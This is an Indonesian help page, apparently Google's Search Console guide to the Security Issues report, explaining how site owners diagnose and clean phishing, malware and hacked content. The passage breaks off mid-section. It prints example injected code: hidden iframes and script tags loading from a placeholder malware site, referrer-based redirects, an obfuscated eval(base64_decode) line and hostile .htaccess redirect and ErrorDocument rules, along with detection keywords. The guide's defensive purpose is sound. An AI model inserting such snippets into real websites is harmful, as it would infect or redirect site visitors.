Laporan Masalah Keamanan

Jika evaluasi Google menetapkan bahwa situs Anda diretas, atau menunjukkan perilaku yang berpotensi membahayakan pengunjung atau komputer mereka, laporan Masalah Keamanan akan menampilkan temuan Google. Contoh perilaku berbahaya termasuk serangan phishing atau penginstalan malware maupun software yang tidak diinginkan pada komputer pengguna.

Halaman atau situs yang terkena dampak masalah keamanan dapat muncul dengan label peringatan di hasil penelusuran atau halaman peringatan interstisial di browser ketika pengguna mencoba membukanya.

Buka laporan Masalah Keamanan

 

Apa itu masalah keamanan?

Masalah keamanan dibagi dalam kategori berikut:

  • Konten yang diretas: Ini adalah konten yang ditempatkan di situs tanpa izin Anda karena kerentanan keamanan pada situs. Untuk melindungi para pengguna, Google berupaya semaksimal mungkin agar konten yang diretas tidak masuk dalam hasil penelusuran. Pelajari lebih lanjut.
  • Malware dan software yang tidak diinginkan: Ini adalah software yang dirancang untuk merusak perangkat atau penggunanya, yang melakukan praktik menipu atau tidak terduga, atau yang berdampak negatif pada pengguna. Pelajari lebih lanjut.
  • Manipulasi psikologis: Ini adalah konten yang menipu pengunjung untuk melakukan hal berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software. Pelajari lebih lanjut.

Apakah situs saya mengalami masalah keamanan?

Jika terdapat masalah keamanan, Anda akan melihat jumlah semua masalah keamanan pada situs di bagian atas laporan.

Jika situs Anda tidak memiliki masalah keamanan, tanda centang hijau dan pesan yang sesuai akan muncul.

Tapi saya baru saja membeli situs ini!

Jika Anda baru saja membeli situs dengan masalah keamanan yang sudah ada sebelumnya, perbaiki masalah yang tercantum dalam laporan Masalah Keamanan, lalu beri tahu kami dalam permintaan pertimbangan ulang bahwa Anda baru saja memperoleh situs tersebut dan telah mematuhi Pedoman Webmaster Google.

Halaman mana saja yang terpengaruh?

Perluas deskripsi masalah untuk melihat daftar sampel URL yang terpengaruh. Daftar ini belum tentu lengkap, karena hanya berisi sampel halaman di situs Anda yang terpengaruh oleh masalah yang dipilih. Terkadang Anda dapat mengalami masalah keamanan tanpa sampel URL; bukan berarti tidak ada halaman yang terpengaruh, hanya saja kami tidak dapat membuat sampel karena beberapa alasan.

Detail masalah menampilkan tanggal ketika masalah pertama kali terdeteksi di situs Anda, serta deskripsi singkat dan link untuk mempelajari masalah tersebut lebih lanjut.

Memperbaiki masalah

Untuk memperbaiki masalah keamanan di situs Anda:

  1. Perluas deskripsi masalah pada laporan Masalah Keamanan.
  2. Baca deskripsi masalah dan ikuti link "Pelajari lebih lanjut" untuk informasi detail dan langkah untuk memperbaiki masalah tersebut. (Link pelajari lebih lanjut mengarah ke deskripsi di halaman ini.)
  3. Gunakan sampel halaman terpengaruh yang disediakan di bagian detail untuk memecahkan dan memperbaiki masalah Anda. Daftar ini belum tentu lengkap, karena hanya berisi sampel halaman di situs Anda yang terpengaruh oleh masalah ini. Anda mungkin memiliki masalah keamanan tanpa sampel URL; bukan berarti tidak ada halaman yang terpengaruh, hanya saja kami tidak dapat membuat sampel karena beberapa alasan.
  4. Perbaiki masalah di seluruh situs Anda. Memperbaiki masalah hanya pada beberapa halaman tidak akan membuat sebagian halaman tersebut dikembalikan ke hasil penelusuran.
  5. Jika laporan mencantumkan beberapa masalah keamanan yang memengaruhi situs Anda, perbaiki semuanya.
  6. Uji perbaikan Anda.
  7. Ketika semua masalah yang tercantum dalam laporan diperbaiki di semua halaman, pilih Minta Peninjauan di laporan Masalah Keamanan. Dalam permintaan pertimbangan ulang, deskripsikan perbaikan yang sudah Anda lakukan. Permintaan yang baik mencakup tiga hal:
    • Menjelaskan masalah kualitas yang sebenarnya di situs Anda.
    • Menjelaskan langkah yang telah Anda lakukan untuk memperbaiki masalah.
    • Mendokumentasikan hasil upaya Anda.
  8. Tinjauan pertimbangan ulang dapat memerlukan waktu satu atau dua minggu. Anda akan diberi tahu progresnya melalui email. Setelah mengirim permintaan, Anda akan menerima pesan konfirmasi yang memberitahukan bahwa peninjauan sedang berlangsung. Jangan kirim ulang permintaan sebelum Anda menerima keputusan akhir tentang permintaan yang belum terselesaikan.

Berapa lama waktu yang diperlukan untuk peninjauan pertimbangan ulang?

Hingga satu atau dua minggu. Setelah permintaan kami terima, Anda akan menerima email pemberitahuan sehingga Anda bisa mengetahui bahwa permintaan tersebut aktif. Anda juga akan menerima email setelah peninjauan selesai.

Harap jangan mengirim ulang permintaan sebelum Anda menerima keputusan akhir tentang permintaan yang belum terselesaikan. Mengajukan permintaan pertimbangan ulang ketika masalah belum diperbaiki dapat menyebabkan waktu penyelesaian untuk permintaan berikutnya menjadi lebih lama, atau bahkan membuat Anda ditandai sebagai pelanggar berulang.

Daftar masalah keamanan

Berikut adalah daftar masalah keamanan yang mungkin terjadi, beserta informasi cara memperbaiki masing-masing masalah.

Halaman penipuan

Situs Anda berisi konten yang menipu pengunjung agar mereka melakukan sesuatu yang berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software. Google Safe Browsing melindungi pengguna web dengan memperingatkan mereka sebelum mengunjungi halaman yang secara konsisten menampilkan konten yang menipu.

Halaman juga dianggap menipu ketika:

  • Bertindak, atau terlihat dan bernuansa seolah-olah seperti entitas tepercaya, misalnya, perangkat atau browser Anda sendiri atau situs itu sendiri, atau
  • Mencoba menipu Anda agar melakukan tindakan yang biasanya dilakukan untuk entitas tepercaya, misalnya, membagikan sandi, menghubungi dukungan teknis, atau mendownload software.

Jenis konten yang menipu ini disebut manipulasi psikologisPelajari manipulasi psikologis lebih lanjut atau lihat contoh halaman penipuan.

Memperbaiki masalah

1. Konfirmasi masalah

Buka contoh halaman untuk mencari konten yang menipu. Anda dapat menggunakan fitur Inspeksi URL untuk melihat situs Anda dalam tampilan seluler dan desktop.

2. Perbaiki halaman Anda

Perbaiki setiap halaman yang terlibat dalam manipulasi psikologis. Jika Anda yakin Safe Browsing salah mengklasifikasikan halaman, harap laporkan di sini.

3. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Resource tersemat yang menipu

Situs Anda berisi iklan yang menipu atau resource tersemat yang menipu pengunjung agar melakukan sesuatu yang berbahaya, seperti mengungkapkan informasi rahasia atau mendownload software yang tidak diinginkan. Konten yang menipu dapat dimasukkan melalui resource yang tersemat di halaman, seperti gambar, komponen pihak ketiga, atau iklan. Google Safe Browsing melindungi pengguna web dengan memperingatkan mereka sebelum mengunjungi halaman yang secara konsisten menampilkan konten yang menipu.

Terkadang konten ini dapat dilihat oleh pengguna di halaman host; dalam kasus lain, situs host tidak berisi iklan yang dapat dilihat, tetapi mengarahkan pengguna ke halaman berbahaya melalui pop-up, pop-under, atau jenis pengalihan lainnya. Biasanya, jenis konten yang disematkan ini akan mengakibatkan pelanggaran kebijakan untuk halaman host.

Jenis konten yang menipu ini disebut manipulasi psikologisPelajari manipulasi psikologis lebih lanjut atau lihat contoh resource tersemat yang menipu.

Memperbaiki masalah

1. Konfirmasi masalah

Buka contoh halaman untuk mencari konten yang menipu. Pastikan tidak ada iklan, gambar, atau resource pihak ketiga tersemat lainnya di halaman situs Anda yang menipu. Perlu diperhatikan bahwa jaringan iklan dapat merotasi iklan yang ditampilkan di halaman situs Anda. Oleh karena itu, Anda mungkin perlu menyegarkan halaman beberapa kali sebelum dapat melihat iklan manipulasi psikologis apa pun yang muncul. Beberapa iklan dapat ditampilkan secara berbeda di perangkat seluler dan komputer desktop. Anda dapat menggunakan fitur Inspeksi URL untuk melihat situs Anda dalam tampilan seluler dan desktop.

2. Hapus iklan atau resource yang menipu

Periksa resource pihak ketiga yang dimasukkan ke dalam situs Anda. Pastikan iklan, gambar, atau resource pihak ketiga tersemat lainnya di halaman situs bukan merupakan konten menipu. Perbaiki setiap halaman yang terlibat dalam manipulasi psikologis

3. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Malware
Situs Anda telah terinfeksi, atau menghosting, malware dari peretas berbahaya. Malware adalah software atau aplikasi seluler yang dirancang khusus untuk merusak komputer, perangkat seluler, software yang dijalankan, atau penggunanya.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Untuk memperbaiki masalah malware di situs Anda, diperlukan kemampuan untuk membaca serta memahami kode, dan mungkin konfigurasi server web untuk situs Anda. Jika Anda merasa hal ini di luar kemampuan, baca Membentuk tim dukungan untuk mempelajari cara menemukan bantuan.

2. Lakukan diagnosis dan perbaiki masalah malware Anda

Ada banyak jenis malware. Baca bagian berikut untuk mencoba mendiagnosis dan memperbaiki jenis malware spesifik Anda. Perhatikan bahwa situs Anda mungkin terinfeksi lebih dari satu jenis malware; telitilah dalam mendiagnosis dan membersihkan situs Anda.

Jenis malware: Konfigurasi server

Deskripsi

Peretas telah menyusupi situs dan mengalihkan pengunjung situs Anda yang bereputasi baik ke situs serangan malware mereka. Hal ini mungkin dilakukan dengan cara memodifikasi file konfigurasi server Anda. File konfigurasi server biasanya mengizinkan administrator situs menentukan pengalihan URL untuk halaman tertentu atau direktori di situs. Misalnya, di server Apache, dapat berupa file .htaccess serta httpd.conf.

Memperbaiki masalah

1. Konfirmasi masalah

Buka beberapa contoh URL yang ditampilkan dalam laporan Masalah Keamanan.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Respons dari halaman yang terinfeksi dengan infeksi "konfigurasi server" dapat berisi header berikut:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Bersihkan situs Anda dari malware "konfigurasi server"

Login ke server Anda melalui shell/akses terminal (situs boleh offline, jika diinginkan) dan tinjau file konfigurasi server yang relevan. Mungkin ada lebih dari satu file konfigurasi server yang diretas di situs Anda. Periksa file tersebut untuk melihat apakah ada perintah yang tidak diinginkan, seperti pengalihan, di mana peretas dapat mengonfigurasi situs Anda agar mengalihkan ke situs serangan malware yang tidak dikenal. Misalnya, dalam file .htaccess, Anda mungkin melihat pengalihan seperti ini:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Selain itu:

  • Pastikan Anda memeriksa seluruh file untuk berjaga-jaga jika peretas menambahkan kode mereka pada bagian akhir file yang mudah terlewatkan.
  • Selidiki adanya kemungkinan penjadwalan tugas yang dibuat oleh peretas yang dirancang untuk terus-menerus memperbarui file .htaccess. Cron job dapat tercantum di beberapa lokasi, termasuk /etc/crontab (serta sejumlah direktori /etc/cron*) dan /var/spool/cron.
  • Baca panduan Peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.
Jenis malware: Injeksi SQL

Deskripsi

Peretas mungkin telah menyusupi database situs Anda. Misalnya, peretas mungkin telah menyisipkan kode berbahaya secara terprogram ke dalam setiap catatan tabel database, sehingga ketika server memuat halaman yang membutuhkan informasi dari database, kode berbahaya telah tersemat dalam konten halaman dan berpotensi membahayakan pengunjung situs.

Memperbaiki masalah

1. Konfirmasi masalah

Jalankan beberapa kueri pada URL yang terpengaruh di command-line, lalu periksa respons untuk kata-kata serangan SQL seperti "iframe" atau "eval".

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Lalu, login ke server database Anda atau lihat database melalui fitur seperti phpMyAdmin. Jika Anda menggunakan Wget atau cURL, coba korelasikan kerusakan yang ditemukan di kode sumber halaman melalui Wget atau cURL dengan entri database yang sesungguhnya. Misalnya, jika Anda melihat laman menyertakan iframe berbahaya, Anda dapat melakukan kueri SQL untuk menelusur kode iframe. Misalnya:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Sebaiknya periksa juga log database dan file yang error untuk melihat apakah ada aktivitas yang tidak biasa, seperti perintah SQL tidak terduga yang tampak tidak wajar untuk pengguna atau error biasa.

2. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengupdate tiap catatan database yang terinfeksi atau memulihkan backup database yang terakhir diketahui.

Selain itu:

  • Baca panduan Peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.
Jenis malware: Injeksi kode

Deskripsi

Halaman di situs Anda diubah untuk memasukkan kode berbahaya, seperti iframe hingga malware situs penyerang.

Memperbaiki masalah

1. Konfirmasi masalah

Buka URL yang terdaftar sebagai terinfeksi dalam laporan Masalah Keamanan. Periksa keberadaan kode berbahaya pada HTML respons.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Berikut beberapa contoh kode berbahaya:

  • iframe yang memuat situs berbahaya:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript atau bahasa skrip lain yang memanggil dan menjalankan skrip dari situs penyerang:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Skrip yang mengalihkan browser ke situs penyerang:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Kode berbahaya yang dikaburkan untuk menghindari deteksi:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • File objek bersama yang dirancang untuk menulis kode berbahaya secara acak ke skrip yang tidak berbahaya:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Selidiki semua kemungkinan kode berbahaya di situs. Tindakan tersebut berfungsi untuk menelusuri kata-kata seperti "iframe" guna menemukan kode iframe. Kata kunci lainnya yang cukup membantu adalah "script", "eval", dan "unescape." Misalnya, untuk menelusuri semua file "iframe" di sistem berbasis Unix:

$grep -irn "iframe" ./ | less

2. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terinfeksi dengan backup terakhir yang tidak terinfeksi atau Anda dapat menghapus injeksi kode dari setiap halaman dan semua fungsi atau file skrip terkait. Jika Anda mengubah file konfigurasi server, mulai ulang server web agar perubahan dapat diterapkan.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.
Jenis malware: template error

Deskripsi

Template yang digunakan untuk pesan error, seperti 404 File not Found, dikonfigurasi untuk menyebarkan malware. Dengan cara ini, penyerang dapat menyerang URL yang bahkan tidak ada di situs Anda.

Memperbaiki masalah

1. Konfirmasi masalah

Minta halaman di situs Anda yang tidak ada, atau yang meunculkan jenis error lain, dan periksa responsnya untuk melihat apakah halaman berasal dari situs lain atau berisi malware.

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Bersihkan situs Anda

Login ke server web Anda dan telusuri file konfigurasi server untuk mendapatkan perintah halaman error. Contohnya, template error untuk server web Apache dapat dinyatakan dalam file .htaccess. Berikut ini contoh entri file .htaccess yang mengambil halaman error 404 dari situs berbahaya:

ErrorDocument 404 http://<malware-site>/index.html 

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file .htaccess dengan backup tidak terinfeksi yang dikenal, atau Anda dapat menghapus perintah ErrorDocument yang tidak diinginkan pada file .htaccess yang sudah ada. Pastikan juga untuk membersihkan file error yang sebenarnya jika ada di situs Anda. Terakhir, mulai ulang server web Anda untuk memastikan semua perubahan diterapkan.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.
Jenis malware: Malware lintas situs

Deskripsi

Situs ini memuat konten dari situs yang diketahui berisi konten berbahaya. Di Chrome, peringatan ini dilambangkan dengan interstisial browser dengan grafis berikut:

cross-site malware warning

Memperbaiki masalah

  1. Konfirmasi masalah dengan menjelajahi beberapa sampel URL yang tercantum dalam laporan Masalah Keamanan. Grafis di atas akan muncul jika ini adalah masalah malware lintas situs.
  2. Peringatan browser akan memberi tahu Anda domain dari konten terkait. Hapus semua referensi ke situs yang ditandai yang tercantum dalam peringatan browser.
  3. Jika Anda menemukan bahwa halaman di situs Anda telah dimasuki konten dari situs yang ditandai tanpa sepengetahuan Anda, masalahnya akan lebih serius dan situs Anda kemungkinan besar telah disusupi. Pada tiap kasus, Google merekomendasikan protokol pemulihan Bantuan untuk Situs yang Diretas untuk mengarantina, menaksir kerusakan, dan membersihkan situs Anda.
  4. Setelah menghapus semua konten manipulasi psikologis dari situs, Anda dapat meminta peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.
  5. Jika Anda dengan sengaja memasukkan konten dari situs valid yang ditandai dan ingin memasukkan kembali konten setelah situs yang ditandai dibersihkan, Anda dapat memantau status situs yang ditandai menggunakan halaman diagnostik Google Safe Browsing untuk situs tersebut (http : //www.google.com/safebrowsing/diagnostic? site = www.example.com). Situs yang valid seringkali dibersihkan dengan cepat oleh pemiliknya.
Jenis malware lain

Ada banyak jenis malware lain yang dapat merusak situs Anda. Lihat situs Dasar-Dasar Web untuk tips lebih lanjut tentang diagnosis dan perbaikan jenis peretasan lainnya. Setelah memperbaiki situs Anda, pastikan untuk meminta peninjauan.

3. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Jenis peretasan: Injeksi kode

Peretas telah menyusupi situs Anda dan menginjeksi kode berbahaya di halaman Anda. Contohnya termasuk pengalihan ke situs berbahaya atau menjalankan mining software mata uang kripto di browser Anda saat halaman terbuka.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (kompatibel; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Peretas mungkin telah menginjeksikan kode berbahaya langsung ke file HTML di situs (misalnya, pengalihan JavaScript) atau ke file yang menghasilkan konten situs Anda (misalnya, file PHP).

Ambil halaman yang disusupi yang tercantum dalam laporan, lalu periksa jawabannya. Peretas dapat menggunakan beberapa macam teknik untuk mengalihkan pengunjung dari situs Anda ke situs mereka; berikut beberapa contohnya:

  • Pengalihan:​
    • Pengalihan header: Peretas dapat mengalihkan pengunjung dengan memodifikasi file konfigurasi server Anda. File konfigurasi server biasanya mengizinkan administrator situs menentukan pengalihan URL untuk halaman tertentu atau direktori di situs. Misalnya, di server Apache, dapat berupa file .htaccess serta httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Pengalihan JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • JavaScript berbahaya yang dimuat dari situs lain:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Kode berbahaya yang dikaburkan untuk menghindari deteksi:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Telusuri kode yang mencurigakan dalam respons dan di situs Anda. Istilah penelusuran yang berguna dapat berupa "search", "eval", "base64_decode", dan "unescape".

3. Bersihkan situs Anda

Saat sudah siap untuk membersihkan situs, Anda dapat mengganti file yang terpengaruh dengan backup terakhir yang tidak terinfeksi atau Anda dapat menghapus sendiri konten yang berisi spam.

Selain itu:

  • Baca panduan peretasan guna mengetahui alur perbaikan lengkap untuk situs Anda, termasuk langkah-langkah pembersihan dan tips untuk mencegah agar situs Anda tidak diretas kembali.

4. Minta peninjauan

Saat mengonfirmasi bahwa masalah telah diperbaiki di situs Anda, mintalah peninjauan keamanan di laporan Masalah Keamanan. Proses peninjauan dapat berlangsung beberapa hari hingga beberapa minggu.

Jenis peretasan: Injeksi konten

Peretas telah menambahkan link atau teks spam ke halaman situs Anda. Konten yang diinjeksikan mungkin berisi istilah farmasi atau spam lain yang tidak terkait dengan konten situs.

Biasanya, peretas memodifikasi situs Anda dengan salah satu cara berikut:

  • Dengan mengakses ke direktori yang tidak aman pada server Anda. Contohnya, Anda mungkin tidak sengaja meninggalkan sebuah direktori dengan izin terbuka.
  • Dengan memanfaatkan kerentanan pada software yang berjalan di situs Anda, misalnya sistem pengelolaan konten. Misalnya, Anda mungkin menjalankan Drupal versi lama yang tidak aman, Joomla!, atau WordPress.
  • Dengan meretas plugin pihak ketiga yang digunakan di situs Anda, seperti penghitung jumlah pengunjung.

1. Pertimbangkan apakah Anda dapat memperbaikinya

Lihat Membentuk tim dukungan untuk mempelajari apa saja yang diperlukan untuk melakukan perbaikan sendiri, atau mengetahui cara menemukan bantuan jika dirasa hal tersebut di luar kemampuan Anda.

2. Konfirmasi masalah

Jangan menggunakan browser untuk melihat langsung halaman yang terinfeksi di situs Anda.

Karena malware sering kali menyebar dengan memanfaatkan kerentanan browser, membuka halaman yang terinfeksi malware di browser dapat merusak komputer Anda. Selain itu, peretas mungkin menyembunyikan konten berisi spam menggunakan teknik penyelubungan agar tidak terdeteksi oleh pemilik situs.

Berikut ini dua metode alternatif untuk melihat konten dengan lebih aman di komputer:

  • Gunakan fitur Inspeksi URL untuk melihat halaman Anda sebagaimana Google melihatnya. Opsi ini berguna karena banyak peretas melakukan perubahan yang hanya terlihat oleh mesin Google. Misalnya, peretas mungkin menambahkan link dari situs Anda ke situsnya yang hanya dirender saat perujuknya adalah Google.
  • Gunakan cURL atau Wget untuk melakukan permintaan HTTP (seperti mengambil halaman) dari command-line. Fitur yang tersedia secara gratis ini berguna dalam mendiagnosis pengalihan, dan dapat menetapkan informasi perujuk atau agen pengguna. Peretas sering menyerang hanya agen pengguna atau perujuk tertentu agar tidak terdeteksi dan memilih target yang lebih baik; sehingga dengan fitur alat ini Anda dapat meniru target. Coba gunakan alamat perujuk lain (seperti link dari situs besar, atau mesin telusur lain) jika permintaan Anda tidak menimbulkan perilaku yang mengandung spam. Misalnya, untuk meniru pengguna yang mengikuti link dari hasil Google Penelusuran ke www.example.com/page.html pada perangkat Windows, Anda akan menggunakan cURL seperti ini:

